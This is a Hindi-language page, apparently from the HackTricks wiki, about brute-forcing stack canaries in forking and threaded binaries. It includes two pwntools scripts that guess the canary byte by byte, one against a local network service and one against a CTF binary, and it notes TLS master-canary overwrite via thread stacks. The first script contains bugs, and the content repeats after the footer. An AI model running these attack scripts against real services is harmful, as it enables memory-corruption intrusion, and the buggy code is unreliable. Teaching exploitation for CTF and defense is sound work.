BF Forked & Threaded Stack Canaries

एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE) जीसीपी हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)

हैकट्रिक्स का समर्थन करें

सदस्यता योजनाएं की जाँच करें!
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @hacktricks_live** पर फॉलो** करें।
हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स](https://github.com/carlospolop/hacktricks) और हैकट्रिक्स क्लाउड](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में पीआर जमा करके।

यदि आपके सामने एक कैनरी द्वारा संरक्षित बाइनरी है और पीआईई (पोजीशन इंडिपेंडेंट एक्जीक्यूटेबल) है, तो आपको उन्हें दरकिनार करने का एक तरीका खोजने की आवश्यकता हो सकती है।

ध्यान दें कि checksec यह नहीं पता लगा सकता है कि एक बाइनरी को कैनरी द्वारा संरक्षित किया गया है अगर यह स्थाई रूप से कंपाइल किया गया था और यह फ़ंक्शन को पहचानने की क्षमता नहीं है। हालांकि, आप इसे मैन्युअल रूप से नोट कर सकते हैं अगर आपको लगता है कि किसी मान को फ़ंक्शन कॉल करने के शुरू में स्टैक में सहेजा गया है और इस मान की जांच की गई है पहले बाहर निकलने से पहले।

ब्रूट फ़ोर्स कैनरी

एक साधारण कैनरी को दरकिनार करने का सबसे अच्छा तरीका यह है अगर बाइनरी एक कार्यक्रम है हर बार जब आप इसके साथ एक नया कनेक्शन स्थापित करते हैं तो चाइल्ड प्रक्रियाएँ फॉर्क करता है (नेटवर्क सेवा), क्योंकि हर बार जब आप इससे कनेक्ट करते हैं वही कैनरी उपयोग की जाएगी।

फिर, कैनरी को दरकिनार करने का सबसे अच्छा तरीका यह है केवल चार द्वारा ब्रूट-फ़ोर्स करना, और आप यह देख सकते हैं कि क्या अनुमानित कैनरी बाइट सही था या गलत बाइट बस यह जांच करके कि क्या एक प्रतिक्रिया सर्वर द्वारा वापस भेजी गई है (दूसरे स्थिति में एक प्रयास/अपेक्षा का उपयोग किया जा सकता है):

उदाहरण 1

यह उदाहरण 64 बिट के लिए लागू किया गया है लेकिन आसानी से 32 बिट के लिए लागू किया जा सकता है।

from pwn import *

def connect():
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

उदाहरण 2

यह 32 बिट के लिए कार्यान्वित किया गया है, लेकिन इसे आसानी से 64 बिट के लिए बदला जा सकता है। इस उदाहरण के लिए प्रोग्राम से पहले एक बाइट की आवश्यकता है जो इनपुट का आकार और पेलोड को दर्शाती है।

from pwn import *

# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21

for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))

# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break

# Return the canary
return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")

धागे

प्रक्रिया के वे धागे भी एक ही कैनरी टोकन को साझा करेंगे, इसलिए यदि बाइनरी हर बार एक हमला होने पर एक नया धागा उत्पन्न करता है तो कैनरी को ब्रूट-फोर्स किया जा सकता है।

इसके अतिरिक्त, एक धागायुक्त फ़ंक्शन में एक बफ़र ओवरफ़्लो जो कैनरी से सुरक्षित है, का उपयोग करके TLS में स्टोर किए गए मास्टर कैनरी को संशोधित किया जा सकता है। यह इसलिए है क्योंकि, एक धागा के स्टैक में बफ़र ओवरफ़्लो के माध्यम से TLS स्टोर किया जाता है (और इसलिए, कैनरी) के मेमोरी स्थिति तक पहुंचना संभव हो सकता है। इस परिणामस्वरूप, संरोधन अनर्थक है क्योंकि जांच का उपयोग दो कैनरी के साथ किया जाता है जो समान हैं (हालांकि संशोधित)। यह हमला लिखाव में किया जाता है: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads

https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015 के प्रस्तुति को भी देखें जिसमें उल्लेख किया गया है कि सामान्यत: TLS को mmap द्वारा स्टोर किया जाता है और जब एक धागे का स्टैक बनाया जाता है तो यह भी mmap द्वारा उत्पन्न किया जाता है जिससे पिछले लेख में दिखाया गया ओवरफ़्लो संभव हो सकता है।

अन्य उदाहरण और संदर्भ

https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
64 बिट, कोई PIE नहीं, nx, BF कैनरी, किसी मेमोरी में execve को कॉल करने के लिए ROP लिखें और वहाँ जाएं।

PreviousStack Canaries NextPrint Stack Canary

Last updated 4 months ago

ब्रूट फ़ोर्स कैनरी

उदाहरण 1

from pwn import *

def connect():
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

उदाहरण 2

from pwn import *

# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21

for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))

# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break

# Return the canary
return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")

धागे